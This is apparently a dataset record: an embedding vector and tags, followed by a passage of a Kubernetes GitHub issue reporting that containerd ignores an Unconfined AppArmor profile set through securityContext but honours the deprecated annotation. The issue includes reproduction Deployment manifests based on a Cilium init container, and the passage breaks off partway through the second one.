0.0007042437209747732, 0.0019251141929998994, 0.01093725860118866, -0.024067189544439316, -0.010423894971609116, 0.0032433278393000364, 0.0049422141164541245, -0.005947188939899206, -0.02753021940588951, -0.004602871835231781, 0.012651371769607067, 0.012720980681478977, 0.025650786235928535, -0.03170673921704292, 0.0008744586375541985, -0.008988216519355774, -0.01290370337665081, 0.003517411882057786, 0.005142339039593935, -0.008866401389241219, -0.0034042978659272194, -0.01197268720716238, 0.0025494166184216738, 0.007356763817369938, -0.005155390594154596, -0.007804869674146175, 0.014295876026153564, -0.00904042273759842, 0.0029322642367333174, -0.001233378192409873, -0.027721643447875977, 0.0031389149371534586, -0.00793103501200676, -0.0033238129690289497, 0.018933551385998726, -0.006486655678600073, -0.005172792822122574, 0.007600394077599049, -0.001097967615351081, 0.003569618333131075, -0.010249873623251915, 0.02177010476589203, -0.00400902284309268, -0.013286550529301167, 0.0006036374834366143, -0.004324437119066715, 0.025407155975699425, -0.0005704645882360637, -0.02570299245417118, -0.02218775637447834, -0.01568804867565632, -0.006525810807943344, -0.017349954694509506, 0.029983924701809883, 0.02025611698627472, -0.01179866585880518, -0.01111127994954586, 0.0017413038294762373, -0.000606356596108526, 0.014382886700332165, 0.003569618333131075, -0.0034782569855451584, 0.01572285406291485, -0.011746459640562534, 0.02105661667883396, 0.014139256440103054, -0.003365142969414592, -0.0003480432496871799, -0.013747707940638065, -0.012355535291135311, 0.014974560588598251, 0.002684283535927534, 0.02070857211947441, -0.03285527974367142, 0.010110655799508095, 0.014400288462638855, -0.018028639256954193, -0.018550705164670944, 0.00553823821246624, -0.02056935615837574, -0.004894358105957508, 0.0069043077528476715, 0.023057864978909492, -0.001106124953366816, -0.008944710716605186, 0.0057035586796700954, 0.005655702669173479, 0.006660677492618561, 0.01600128784775734, -0.022692419588565826, -0.013669397681951523, 0.007317609153687954, 0.014556908048689365, 0.009301455691456795, -0.0039872704073786736, 0.012433844618499279, -0.018185259774327278, -0.011372312903404236, -0.0032542042899876833, 0.017384760081768036, -0.007395918946713209, 0.021230638027191162, 0.008783740922808647, 0.017906824126839638, 0.006482305470854044, -0.01610570028424263, -0.052798159420490265, -0.015975184738636017, 0.01188567653298378, 0.0044027469120919704, 0.015618439763784409, 0.01983846351504326, -0.004226549994200468, -0.023249289020895958, 0.00515103992074728, -0.013356159441173077, 0.008744586259126663, -0.009466775692999363, 0.009162237867712975, 0.004450602922588587, -0.0217352993786335, 0.0467074029147625, 0.0008287779637612402, 0.0063648405484855175, -0.012312029488384724, 0.0010403229389339685, 0.004148240201175213, 0.010484802536666393, 0.012320730835199356, 0.01554013043642044, 0.00998884066939354, -0.023614734411239624, 0.010510905645787716, -0.02183971367776394, 0.001106124953366816, -0.02700815536081791, -0.0025798704009503126, 0.008122459053993225, -0.01915978081524372, 0.0007395918946713209, 0.011598540470004082, 0.02239658311009407, 0.015087674371898174, 0.032507237046957016, 0.0018207011744379997, -0.000028669381208601408, 0.008944710716605186, 0.005881930701434612, -0.028817979618906975, -0.0010104130487889051, 0.012294627726078033, 0.022100744768977165, -0.004502809140831232, 0.0007966927369125187, -0.0027625930961221457, 0.0019979856442660093, 0.005255452822893858, 0.016819190233945847, -0.0021089245565235615, -0.011746459640562534, 0.007848374545574188, -0.002940965350717306, 0.005699208006262779, -0.0031497913878411055, -0.017941629514098167, 0.029757697135210037, -0.004380994010716677, -0.0014258896699175239, -0.016575559973716736, 0.008614069782197475, -0.012503453530371189, -0.001298636314459145, 0.0038241250440478325, 0.018968356773257256, 0.0011431045131757855, 0.018933551385998726, 0.014809239655733109, -0.002573344623669982, -0.010711031034588814, 0.0025820457376539707, -0.022100744768977165, -0.020308323204517365, 0.013704202137887478, 0.02095220237970352, -0.02570299245417118, 0.013208241201937199, -0.004117786418646574, 0.007848374545574188, -0.0029235631227493286, 0.0007814658456481993, 0.0030845331493765116, -0.004156941547989845, -0.027025558054447174, -0.014121854677796364, -0.0043635922484099865, 0.026207655668258667, -0.020586756989359856, 0.004794295411556959, -0.02170049585402012, 0.019681844860315323, -0.02053455077111721, -0.018202660605311394, 0.0071522886864840984, 0.010267275385558605, 0.015148581936955452, -0.0018522426253184676, -0.0074089705012738705, -0.0029757695738226175, 0.0036544539034366608, 0.006447501014918089, -0.003500009886920452, -0.004555015824735165, -0.034473683685064316, -0.008848999626934528, 0.01293850690126419, 0.01045869942754507, 0.005951539147645235, -0.00822687242180109, 0.019438214600086212, 0.013269148766994476, 0.0022133374586701393, 0.0003110636316705495, 0.023301495239138603, 0.0022035487927496433, -0.024206407368183136, -0.0029453157912939787, -0.005690507125109434, -0.008618420921266079, -0.018063444644212723, 0.026938546448946, -0.015844669193029404, 0.0058123222552239895, -0.0049509149976074696, 0.011415817774832249, -0.026712318882346153, -0.011241796426475048, -0.024850286543369293, 0.021752702072262764, -0.0076308478601276875, -0.00689125619828701, -0.011224394664168358, -0.030018728226423264, 0.011937882751226425, 0.0038893830496817827, -0.025650786235928535, 0.015131179243326187, -0.0027451911009848118, -0.01987326890230179, -0.01536610908806324, -0.002577695297077298, 0.022970853373408318, 0.0032650805078446865, 0.0024210757110267878, -0.006534511689096689, -0.012459947727620602, 0.007069628220051527, 0.00808765459805727, -0.01860291138291359, -0.005908033810555935, -0.012050997465848923, -0.008988216519355774, 0.010650123469531536, -0.020099496468901634, 0.0019283770816400647, 0.0009897479321807623, 0.015418315306305885, 0.003186770947650075, -0.016305824741721153, -0.005259803496301174, 0.0069434624165296555, 0.02246619015932083, 0.021021811291575432, 0.008148562163114548, 0.003776269033551216, -0.0035804947838187218, -0.007717858534306288, -0.013834718614816666, -0.02521573193371296, 0.0076656523160636425, -0.010824144817888737, -0.009257949888706207, -0.001298636314459145, -0.009571189060807228, 0.029026806354522705, 0.002949666464701295, -0.012251121923327446, -0.011494128033518791, -0.003252028953284025, 0.005338113289326429, 0.0011768211843445897, -0.001221414189785719, 0.032611649483442307, 0.002188321901485324, -0.005416423082351685, 0.009954036213457584, -0.027269188314676285, -0.006604120600968599, -0.0005391950835473835, -0.008052850142121315, 0.004082982428371906, -0.00210131099447608, -0.025790004059672356, -0.011259199120104313, -0.010693628340959549, 0.0038045477122068405, 0.006612821482121944, -0.004039476625621319, 0.006012446712702513, -0.008657575584948063, -0.019037965685129166, 0.019734051078557968, -0.019316399469971657, -0.017149830237030983, 0.009753911755979061, 0.0019794958643615246, 0.018446290865540504, 0.008440048433840275, 0.002137203002348542, -0.024450037628412247, -0.0031367396004498005, 0.010249873623251915, -0.014365484938025475, -0.012138008140027523, 0.015357407741248608, -0.00952768325805664, 0.0141914626583457, 0.019786257296800613, -0.0031715440563857555, 0.02015170268714428, -0.02873096987605095, 0.024763276800513268, 0.006595419254153967, 0.006752038840204477, -0.0007782028988003731, 0.014226267114281654, -0.003280307399109006, -0.0004255372332409024, -0.005694857332855463, 0.009257949888706207, -0.013930430635809898, 0.0067781419493258, -0.0070522259920835495, 0.011189590208232403, -0.0007134886109270155, 0.0009587503736838698, -0.01498326100409031, 0.017036715522408485, 0.0037175368051975965, -0.013303952291607857, -0.022727223113179207, -0.004322262015193701, 0.01846369355916977, -0.01755008101463318, -0.006617172155529261, -0.005908033810555935, -0.003730588359758258, -0.008888154290616512, 0.0001261656725546345, -0.006595419254153967, 0.021300246939063072, -0.005929786711931229, -0.026938546448946, -0.022031137719750404, -0.01378251239657402, -0.008396542631089687, -0.02387576550245285, 0.006839049514383078, 0.004911760333925486, 0.0022731574717909098, 0.018028639256954193, -0.026781927794218063, -0.012172812595963478, -0.01849849708378315, 0.011633344925940037, 0.01164204627275467, 0.01424366980791092, -0.011737758293747902, -0.017785008996725082, -0.009623395279049873, -0.001159419072791934, -0.007761364337056875, 0.010275976732373238, -0.018724726513028145, 0.017671896144747734, -0.007522084284573793, 0.021091420203447342, -0.00006427244079532102, 0.011041671968996525, -0.005633949767798185, 0.00198275875300169, -0.0011518056271597743, -0.000303178298054263, 0.007500331848859787, -0.034612901508808136, -0.0023732197005301714, -0.01621011458337307, 0.01179866585880518, -0.0002958367404062301, -0.002884408226236701, -0.0003730588359758258, -0.016941005364060402, 0.004280931781977415, -0.020899996161460876, 0.0050161732360720634, -0.010928557254374027, 0.025163525715470314, 0.013225642964243889, 0.01874212734401226, -0.015548831783235073, 0.026712318882346153, 0.004711635410785675, -0.008039798587560654, -0.002059980994090438, -0.010336884297430515, 0.001244254526682198, -0.0017326027154922485, 0.014130555093288422, 0.002884408226236701, 0.0019816712010651827, -0.002318838145583868, -0.005477330647408962, 0.006773791275918484, 0.00004150007589487359, -0.021543877199292183, -0.01527909841388464, 0.006425748113542795, -0.018376681953668594, -0.009814819321036339, 0.00016627222066745162, 0.011702953837811947, 0.0009560312610119581, 0.0013367035426199436, -0.007539486512541771, -0.018655117601156235, -0.015400913543999195, -0.009188340976834297, -0.006338737439364195, -0.0018337528454139829, -0.009945335797965527, 0.01578376069664955, -0.011598540470004082, -0.0141914626583457, -0.005094483029097319, 0.0017793710576370358, -0.003763217478990555, 0.009840922430157661, 0.008587966673076153, -0.0015324779087677598, 0.010449998080730438, -0.011772562749683857, 0.01652335189282894, -0.004448427818715572, 0.0035065356642007828, -0.004191745538264513, 0.001964268973097205, -0.006908658426254988, 0.009188340976834297, -0.02267501689493656, -0.00010957923950627446, 0.004820398986339569, 0.010789340361952782, -0.0033847205340862274, 0.013678099028766155, -0.019751453772187233, -0.009997542016208172, 0.005681805778294802, 0.046463772654533386, 0.0012627443065866828, -0.0202909205108881, -0.000901649531442672, 0.0014867972349748015, -0.009301455691456795, -0.016993211582303047, -0.004672480281442404, -0.025128722190856934, 0.028748370707035065, -0.00004122816972085275, -0.056243788450956345, -0.012024893425405025, -0.015270397067070007, 0.001502024126239121, 0.00018612155690789223, -0.0027277888730168343, -0.012712279334664345, 0.011668149381875992, 0.014356783591210842, 0.011824768967926502, -0.004894358105957508, -0.010676226578652859, -0.001983846537768841, 0.001996898092329502, -0.0030736569315195084, -0.004341839347034693, 0.019455617293715477, -0.019490420818328857, 0.005451227072626352, -0.008805493824183941, 0.013034218922257423, 0.0022709821350872517, 0.013808615505695343, 0.014583011157810688, -0.014565609395503998, 0.005773167125880718, -0.005364216398447752, 0.009545085951685905, 0.02183971367776394, -0.0006629136041738093, 0.028104491531848907, 0.00519454525783658, -0.0253201462328434, -0.00641704723238945, -0.017097624018788338, -0.0006775966612622142, -0.005734012462198734, 0.013321354985237122, 0.03751906007528305, -0.012364235706627369, -0.016479847952723503, 0.014374185353517532, -0.0028887588996440172, -0.02893979474902153, -0.006860802415758371, 0.011389714665710926, 0.0017837216146290302, -0.002049104543402791, -0.0029257384594529867, 0.003473906544968486, 0.0012736207572743297, -0.021004408597946167, -0.0032455031760036945, -0.004559366498142481, -0.007448125164955854, -0.006612821482121944, 0.0057035586796700954, -0.0013638944365084171, 0.013747707940638065, 0.009753911755979061, -0.007643899414688349, 0.014626516960561275, 0.025824807584285736, -0.03682297468185425, 0.008896855637431145, -0.015731554478406906, -0.016018690541386604, 0.04040781781077385, -0.01285149622708559, -0.00555563997477293, -0.023545125499367714, -0.01086764968931675, 0.0048769558779895306, 0.002625551074743271, 0.002464581048116088, 0.00399814685806632, 0.012433844618499279, 0.00358267012052238, -0.012390338815748692, 0.004646377172321081, -0.017080221325159073, 0.028609154745936394, -0.01348667498677969, 0.009292754344642162, -0.02732139453291893, 0.013765109702944756, 0.00840524397790432, -0.0052728550508618355, 0.00693476153537631, -0.00641704723238945, 0.001865294179879129, 0.012077100574970245, 0.007435073610395193, 0.005046627018600702, -0.0021524298936128616, -0.007178391795605421, -0.02236177772283554, -0.002649479079991579, -0.02095220237970352, -0.014539506286382675, 0.009632096625864506, -0.00456371670588851, -0.0035152367781847715, -0.000018064938558381982, -0.012225018814206123, 0.004650727845728397, 0.002102398779243231, 0.02497210167348385, 0.01527909841388464, 0.007865777239203453, -0.017906824126839638, 0.0020023363176733255, -0.013373561203479767, 0.009875726886093616, 0.003919837065041065, 0.0013736831024289131, 0.012216317467391491, -0.010658823885023594, 0.005729661788791418, -0.00012276681081857532, -0.0031476160511374474, -0.011737758293747902, 0.004628974944353104, 0.0038980841636657715, -0.02180490829050541, 0.010293378494679928, 0.015844669193029404, 0.0017565307207405567, 0.004898708313703537, -0.008622771129012108, -0.007974540814757347, 0.003989445511251688, 0.024589255452156067, 0.006234324537217617, 0.008936010301113129, -0.009710405953228474, 0.004354890901595354, 0.00388503260910511, 0.000041805975342867896, 0.02401498332619667, 0.0032781322952359915, -0.00849225465208292, 0.008566213771700859, -0.00768305454403162, 0.006839049514383078, -0.007643899414688349, -0.004498458933085203, 0.0019283770816400647, -0.015444418415427208, 0.010223769582808018, 0.014791837893426418, 0.009867025539278984, -0.012294627726078033, 0.021717898547649384, -0.009771313518285751, -0.0021937601268291473, 0.003197647165507078, 0.007400269154459238, 0.01083284616470337, 0.0069043077528476715, -0.02507651597261429, 0.012616567313671112, 0.020691171288490295, 0.014965859241783619, -0.024658862501382828, 0.002821325557306409, -0.0012942857574671507, 0.01078063901513815, -0.016784384846687317, -0.004637676291167736, -0.008679328486323357, 0.01751527562737465, -0.002015387872233987, 0.008418295532464981, -0.00048019090900197625, 0.010136758908629417, -0.0029322642367333174, 0.007169690448790789, -0.022135550156235695, -0.002133940113708377, 0.010928557254374027, 0.00840524397790432, 0.017463069409132004, 0.01617530919611454, 0.005429474636912346, 0.013277849182486534, -0.0022666314616799355, -0.009066525846719742, 0.0057775177992880344, 0.019142378121614456, 0.016975808888673782, 0.004663779400289059, -0.00863147247582674, 0.0009712581522762775, -0.009588590823113918, 0.01091985683888197, 0.00499442033469677, -0.02060415968298912, 0.009518982842564583, -0.017732802778482437, 0.013739006593823433, -0.017358656972646713, 0.032542042434215546, -0.008179016411304474, 0.03149791434407234, 0.024310819804668427, -0.0004510966537054628, -0.011154785752296448, 0.014408989809453487, 0.008905556052923203, 0.007826622575521469, 0.0030083986930549145, -0.010354286059737206, -0.017732802778482437, 0.0028300266712903976, 0.019960278645157814, 0.008548812009394169, -0.01452210359275341, 0.0037414648104459047, 0.016288423910737038, -0.0022024610079824924, -0.011781263165175915, 0.027617231011390686, 0.016157906502485275, 0.007987592369318008, 0.023440711200237274, 0.00729585625231266, 0.018133051693439484, -0.016505951061844826, 0.012973311357200146, 0.004837800748646259, -0.0363009087741375, 0.0020545427687466145, 0.002608149079605937, -0.01378251239657402, -0.004472355358302593, -0.016018690541386604, -0.007000019773840904, 0.01467872317880392, -0.006016797386109829, 0.0009478739812038839, 0.027512818574905396, 0.005277205724269152, 0.013739006593823433, 0.0015857720281928778, -0.0008450924651697278, 0.009136134758591652, 0.006456201896071434, -0.00362617545761168, -0.0057775177992880344, 0.012538257986307144, 0.01085024792701006, 0.019716648384928703, -0.031167272478342056, -0.005742713343352079, 0.0015792461344972253, 0.016027390956878662, -0.015418315306305885, -0.00016994298493955284, 0.01132010668516159, -0.02608584053814411, -0.008165964856743813, -0.0044767060317099094, 0.020029887557029724, 0.010441296733915806, 0.019716648384928703, 0.005085781682282686, -0.007565589621663094, 0.011789964511990547, -0.0003812161157839, 0.011685552075505257, 0.022309571504592896, 0.0018598560709506273, 0.0070130713284015656, -0.024554450064897537, -0.010197666473686695, -0.014896250329911709, 0.025964025408029556, -0.021282844245433807, -0.0188465416431427, -0.010441296733915806, 0.032263606786727905, 0.030227554962038994, 0.01100686751306057, 0.009649498388171196, -0.033568769693374634, -0.007495981175452471, -0.009101330302655697, 0.0024798079393804073, -0.0067781419493258, 0.023075265809893608, 0.02380615659058094, -0.006225623190402985, 0.00179133506026119, 0.0024819832760840654, 0.038876429200172424, 0.019281595945358276, 0.005229349713772535, 0.017924226820468903, -0.009292754344642162, -0.027234382927417755, 0.03245503082871437, -0.00634743832051754, 0.023997580632567406, 0.006782492622733116, -0.019316399469971657, 0.012964610941708088, -0.0006678079371340573, -0.019455617293715477, 0.01856810599565506, -0.005881930701434612, -0.013826017268002033, 0.0006020060391165316, -0.012024893425405025, 0.006969565991312265, 0.024711070582270622, -0.018863942474126816, 0.004846502095460892, 0.012399040162563324, 0.0019577431958168745, -0.01393913198262453, 0.019734051078557968, -0.007265402469784021, -0.00926665123552084, 0.031950369477272034, -0.03362097591161728, -0.012251121923327446, 0.027547622099518776, -0.00904042273759842, -0.01125049777328968, -0.014704826287925243, 0.028574349358677864, -0.005573042202740908, 0.006051601842045784, 0.007108782883733511, -0.01016286201775074, 0.006956513971090317, 0.028052285313606262, 0.0040068477392196655, -0.019647041335701942, 0.01339966431260109, 0.011276600882411003, -0.0008728271932341158, -0.003606598125770688, 0.013095126487314701, -0.020621562376618385, 0.012964610941708088, -0.007422022055834532, 0.006299582775682211, -0.003110636491328478, 0.0036327012348920107, 0.012312029488384724, 0.007060927338898182, -0.01293850690126419, -0.004816048312932253, -0.006651976145803928, 0.021857114508748055, -0.01507027167826891, -0.01582726649940014, 0.0003594634181354195, -0.0025602930691093206, 0.019107572734355927, -0.01345187146216631, 0.02015170268714428, -0.0023253639228641987, -0.02725178562104702, -0.0032237505074590445, 0.0029257384594529867, 0.016201412305235863, 0.024450037628412247, -0.004365767352283001, -0.0031606676056981087, 0.013678099028766155, -0.009414569474756718, 0.002027351874858141, -0.008357387967407703, 0.022796832025051117, 0.007509032730013132, -0.013034218922257423, -0.001803299062885344, 0.020691171288490295, -0.008701080456376076, -0.007939736358821392, -0.02060415968298912, -0.00341082364320755, -0.007274103816598654, -0.0005976554821245372, -0.009893128648400307, -0.007617796305567026, 0.012651371769607067, 0.0028278513345867395, 0.026503492146730423, -0.00046469210064969957, -0.007909282110631466, 0.02429341711103916, 0.012007491663098335, -0.009031722322106361, 0.019298996776342392, -0.008361739106476307, 0.013956533744931221, -0.009214445017278194, 0.02056935615837574, 0.009379765018820763, -0.013138632290065289, 0.0004415798466652632, 0.02605103701353073, 0.00012636960309464484, 0.014060947112739086, 0.012277225032448769, 0.0015977360308170319, 0.0037958465982228518, -0.002799572888761759, 0.03083663061261177, 0.013060322031378746, 0.006447501014918089, 0.004011198412626982, 0.009545085951685905, -0.026103243231773376, -0.01627972163259983, -0.010693628340959549, -0.01815045438706875, -0.0012736207572743297, 0.0045115104876458645, -0.009310156106948853, -0.004415798466652632, 0.001331265433691442, -0.013512779027223587, 0.045663271099328995, 0.005129287019371986, -0.018376681953668594, -0.00689125619828701, -0.007757013663649559, -0.01572285406291485, 0.0201168991625309, 0.01547052152454853, 0.029635882005095482, 0.008165964856743813, -0.002046929206699133, -0.011067775078117847, 0.0068651526235044, -0.019455617293715477, -0.004685531836003065, 0.019455617293715477, -0.0018794335192069411, 0.018272269517183304, -0.007709157653152943, -0.016062194481492043, 0.0069434624165296555, 0.0023036112543195486, -0.0006270216545090079, -0.0031497913878411055, -0.011346209794282913, -0.003312936518341303, -0.01179866585880518, 0.004568067379295826, 0.007539486512541771, 0.013469273224473, -0.0013715078821405768, 0.01677568443119526, -0.004555015824735165, -0.012303328141570091, 0.008179016411304474, -0.011859573423862457, 0.023231886327266693, -0.006173416972160339, -0.008004994131624699, -0.018063444644212723, 0.012686176225543022, 0.013243044726550579, 0.01574895717203617, -0.0023536423686891794, -0.018167857080698013, 0.01195528544485569, 0.009780014865100384, 0.007735260762274265, 0.0020110374316573143, 0.006638924591243267, -0.01285149622708559, 0.0063648405484855175, 0.010885052382946014, 0.018307074904441833, 0.0007586255087517202, -0.014113153330981731, 0.0012257647467777133, 0.014565609395503998, 0.008161613717675209, 0.009753911755979061, 0.0018522426253184676, 0.012416442856192589, 0.0034260505344718695, 0.00024757295614108443, 0.00020134844817221165, 0.010893753729760647, -0.005594795104116201, 0.0034064732026308775, 0.018794335424900055, 0.01912497542798519, -0.0014661321183666587, 0.00800064392387867, 0.0023993230424821377, -0.022970853373408318, 0.01276448555290699, -0.01599258743226528, -0.004672480281442404, -0.006247376091778278, 0.0015411789063364267, -0.019716648384928703, 0.006517109461128712, 0.0013541057705879211, 0.0032237505074590445, -0.017750205472111702, -0.005103183910250664, 0.02925303392112255, -0.010293378494679928, 0.008361739106476307, 0.020169105380773544, 0.0068216472864151, 0.007195794023573399, -0.007596043404191732, -0.010815443471074104, 0.012573061510920525, 0.004829099867492914, -0.0058862813748419285, -0.004454953595995903, -0.018863942474126816, 0.014269772917032242, 0.01747176982462406, 0.011050372384488583, 0.01670607551932335, 0.002586396411061287, -0.003980744630098343, 0.0018620312912389636, 0.01822006329894066, 0.009292754344642162, 0.028609154745936394, 0.013582387007772923, -0.011468024924397469, 0.00752643495798111, 0.003569618333131075, -0.004729037638753653, -0.0018261393997818232, -0.007835322991013527, 0.027617231011390686, -0.005964591167867184, 0.03396901860833168, 0.03024495765566826, 0.028156697750091553, -0.0009098067530430853, 0.02873096987605095, 0.016653869301080704, -0.012895002029836178, 0.0033542667515575886, 0.011685552075505257, -0.027652034536004066, -0.0027495415415614843, 0.0016760457074269652, 0.009170939214527607, -0.00003291795655968599, 0.02425861358642578, 0.0074829296208918095, -0.013051621615886688, 0.013599789701402187, -0.011528932489454746, 0.006234324537217617, 0.003765392815694213, 0.015026766806840897, 0.029792500659823418, -0.01520948950201273, 0.0028256759978830814, 0.014017441309988499, 0.021422062069177628, 0.03369058668613434, 0.013425767421722412, 0.011459323577582836, -0.005651351995766163, 0.014635218307375908, -0.0048769558779895306, -0.02756502479314804, 0.033707987517118454, 0.005429474636912346, -0.008357387967407703, -0.03852838650345802, 0.0014530805638059974, 0.0064736041240394115, 0.0045854696072638035, -0.017872020602226257, -0.010537008754909039, 0.012886300683021545, 0.00510753458365798, -0.025337547063827515, -0.003465205430984497, -0.0072349486872553825, -0.019438214600086212, 0.006582367699593306, -0.009945335797965527, -0.002281858352944255, 0.002529839286580682, -0.016862694174051285, -0.0022927348036319017, -0.022918647155165672, -0.014234968461096287, 0.007422022055834532, 0.00951028149574995, 0.0005443613626994193, -0.011450622230768204, 0.013417067006230354, 0.00313021382316947, -0.0062517267651855946, -0.002840902889147401, 0.012233720161020756, 0.004668130073696375, -0.018272269517183304, 0.007043525110930204, -0.010380389168858528, 0.00519454525783658, -0.0004935144097544253, 0.00381977460347116, 0.011032970622181892, -0.009658199734985828, 0.0007771152886562049, -0.014739630743861198, 0.017236841842532158, 0.004816048312932253, -0.00878809206187725, 0.0025820457376539707, 0.01005844958126545, 0.006116860080510378, -0.006273479200899601, -0.01607089675962925, 0.0008004994597285986, -0.0026560048572719097, 0.02218775637447834, -0.008413945324718952, -0.0014726578956469893, 0.004977018106728792, 0.015165983699262142, -0.012155409902334213, 0.016062194481492043, -0.005503433756530285, -0.006356139667332172, 0.0032433278393000364, -0.022274767979979515, 0.0033325140830129385, 0.005916735157370567, 0.009231846779584885, 0.010954661294817924, -0.005660053342580795, -0.011511529795825481, -0.016584260389208794, 0.003101935377344489, 0.011833470314741135, -0.01554013043642044, -0.007504682056605816, -0.01607089675962925, 0.0002944772131741047, 0.021526474505662918, -0.003624000120908022, -0.01100686751306057, 0.007752662990242243, -0.019751453772187233, 0.01656685769557953, 0.004668130073696375, -0.006051601842045784, -0.029026806354522705, 0.014991962350904942, -0.005442526191473007, 0.004307034891098738, -0.02015170268714428, -0.004222199320793152, -0.0020099496468901634, -0.003291183849796653, -0.0141914626583457, 0.010171563364565372, -0.00589933292940259, 0.011876975186169147, 0.0025668188463896513, 0.00519454525783658, 0.0049509149976074696, -0.004022074863314629, -0.002071944996714592, 0.003315111855044961, 0.007343712262809277, -0.001953392755240202, 0.010171563364565372, -0.009014319628477097, -0.010206367820501328, -0.019768856465816498, -0.007435073610395193, -0.03421264886856079, -0.00013792573008686304, -0.0025341897271573544, -0.011981388553977013, 0.005951539147645235, 0.009205743670463562, -0.009980139322578907, 0.012320730835199356, -0.016758281737565994, -0.009484178386628628, 0.006608470808714628, 0.00107240816578269, 0.0016673445934429765, -0.04033821076154709, 0.004459303803741932, -0.008122459053993225, -0.016218814998865128, 0.07134886085987091, -0.0072349486872553825, -0.010537008754909039, 0.003058430040255189, 0.021422062069177628, -0.00904042273759842, -0.0037806197069585323, -0.014008739963173866, -0.0023753950372338295, -0.015148581936955452, -0.007904931902885437, -0.03287268429994583, 0.023197080940008163, -0.007661301642656326, -0.019107572734355927, -0.008822895586490631, -0.0009206831455230713, 0.01545311976224184, -0.007491630502045155, -0.02862655557692051, -0.0029126869048923254, 0.0027821706607937813, 0.008840298280119896, -0.0023101370315998793, -0.014687424525618553, 0.002034965204074979, 0.004291808232665062, 0.010084552690386772, -0.011981388553977013, -0.015775060281157494, 0.0038219497073441744, 0.008840298280119896, -0.0014900601236149669, 0.011789964511990547, 0.003547865664586425, 0.007348062936216593, -0.00503792567178607, 0.024571852758526802, -0.016358032822608948, -0.01691490039229393, 0.0077787660993635654, -0.020377932116389275, -0.0019762329757213593, -0.0127470837906003, 0.004685531836003065, 0.016053494065999985, 0.013808615505695343, 0.0017445667181164026, -0.00873588491231203, 0.009188340976834297, 0.00037006783531978726, 0.007939736358821392, -0.008348687551915646, 0.004191745538264513, -0.005251102149486542, -0.014356783591210842, 0.0006569316028617322, -0.01801123656332493, -0.02907901257276535, -0.008683678694069386, -0.0043374886736273766, -0.010362987406551838, -0.005507784429937601, -0.007961489260196686, -0.021248038858175278, 0.013669397681951523, 0.021422062069177628, -0.0017336903838440776, -0.004459303803741932, 0.013582387007772923, -0.013060322031378746, -0.015400913543999195, 0.01726294495165348, -0.027234382927417755, 0.0010919856140390038, -0.02359733171761036, -0.012816691771149635, -0.01564454287290573, -0.01498326100409031, -0.006264778319746256, 0.006769441068172455, -0.01768929697573185, -0.007073978893458843, -0.00935366190969944, -0.01441769115626812, -0.009945335797965527, 0.005973292049020529, 0.0026647059712558985, -0.011894377879798412, 0.012425143271684647, 0.02605103701353073, -0.008831596933305264, 0.008022396825253963, 0.012712279334664345, -0.024745874106884003, 0.009518982842564583, 0.003021450247615576, -0.008413945324718952, 0.0063256858848035336, 0.020308323204517365, 0.014765733852982521, -0.00007103617099346593, 0.009431971237063408, 0.006051601842045784, 0.005399020854383707, -0.011050372384488583, 0.006773791275918484, -0.02928783744573593, -0.0032998849637806416, 0.020099496468901634, 0.0008885978604666889, 0.017497872933745384, -0.004183044657111168, -0.005407721735537052, -0.003110636491328478, 0.014774435199797153, 0.007182742469012737, 0.00935366190969944, 0.022883843630552292, -0.021352453157305717, 0.0009092629770748317, -0.00849225465208292, 0.023927971720695496, -0.012024893425405025, 0.0037044852506369352, 0.00276911910623312, -0.0019457791931927204, -0.0045854696072638035, 0.029896913096308708, 0.0019501297501847148, -0.010563111864030361, -0.012303328141570091, -0.014087050221860409, -0.007178391795605421, 0.014104451984167099, 0.017889421433210373, -0.00641704723238945, 0.0049509149976074696, 0.039607319980859756, 0.0005364760290831327, 0.002281858352944255, 0.059236958622932434, 0.006686780601739883, -0.0007760276785120368, -0.01171165518462658, 0.021178431808948517, -0.002231827238574624, -0.011015568859875202, 0.00456371670588851, -0.02525053732097149, 0.021074017509818077, -0.014321979135274887, 0.0130081158131361, 0.005816672462970018, -0.007874478586018085, 0.022518398240208626, 0.0053816186264157295, 0.0032455031760036945, -0.019473018124699593, 0.01688009686768055, 0.003291183849796653, 0.007787467446178198, -0.0037175368051975965, -0.005255452822893858, 0.013025518506765366, -0.0035804947838187218, 0.013791212812066078, -0.0030432031489908695, 0.02704295888543129, -0.016471145674586296, -0.002940965350717306, 0.014643918722867966, 0.007117484230548143, 0.003356441855430603, 0.009997542016208172, 0.008661925792694092, 0.01379991415888071, 0.013886924833059311, 0.020343126729130745, -0.0030192751437425613, 0.010667525231838226, 0.004637676291167736, -0.013930430635809898, -0.0020784707739949226, 0.02328409254550934, 0.006343088112771511, -0.02331889607012272, -0.0030627804808318615, 0.0007656951202079654, 0.019211987033486366, -0.0035065356642007828, 0.015096375718712807, 0.01132010668516159, 0.008944710716605186, -0.004037301521748304, 0.007361114490777254, -0.008566213771700859, -0.014052245765924454, 0.001899010851047933, 0.004113436210900545, -0.008714132942259312, -0.014269772917032242, 0.0018576807342469692, 0.0215612780302763 ]
null
null
null
null
null
null
null
null
null
[ "kubernetes", "kubernetes" ]
### What happened? If I define the podSecurityContext with appArmorProfile unconfined, containerd does not take it into account and use the default cri-containerd.apparmor.d profile. I don't have the problem if I use the deprecated annotations. ### What did you expect to happen? The securityContext should give the same result as the annotations. According to #123811 containerd uses both methods. ### How can we reproduce it (as minimally and precisely as possible)? This deployment works with annotations: ``` apiVersion: apps/v1 kind: Deployment metadata: name: test namespace: test spec: selector: matchLabels: mytest: test template: metadata: labels: mytest: test annotations: container.apparmor.security.beta.kubernetes.io/mount-cgroup: unconfined spec: initContainers: - name: mount-cgroup image: quay.io/cilium/cilium:v1.15.4 env: - name: CGROUP_ROOT value: /run/cilium/cgroupv2 - name: BIN_PATH value: /opt/cni/bin securityContext: appArmorProfile: type: Unconfined capabilities: add: - SYS_ADMIN - SYS_CHROOT - SYS_PTRACE drop: - ALL seLinuxOptions: level: s0 type: spc_t command: - sh - -ec - ls -la /hostproc/1/ns/cgroup volumeMounts: - name: hostproc mountPath: /hostproc containers: - name: busybox image: busybox command: - sleep - "300" securityContext: appArmorProfile: type: Unconfined volumes: - name: hostproc hostPath: path: /proc type: Directory ``` But this one doesn't. ``` apiVersion: apps/v1 kind: Deployment metadata: name: test namespace: test spec: selector: matchLabels: mytest: test template: metadata: labels: mytest: test spec: initContainers: - name: mount-cgroup image: quay.io/cilium/cilium:v1.15.4 env: - name: CGROUP_ROOT value: /run/cilium/cgroupv2 - name: BIN_PATH value: /opt/cni/bin securityContext: appArmorProfile: type: Unconfined capabilities: add: - SYS_ADMIN - SYS_CHROOT - SYS_PTRACE drop: - ALL seLinuxOptions: level: s0 type: spc_t command: - sh - -ec - ls -la /hostproc/1/ns/cgroup 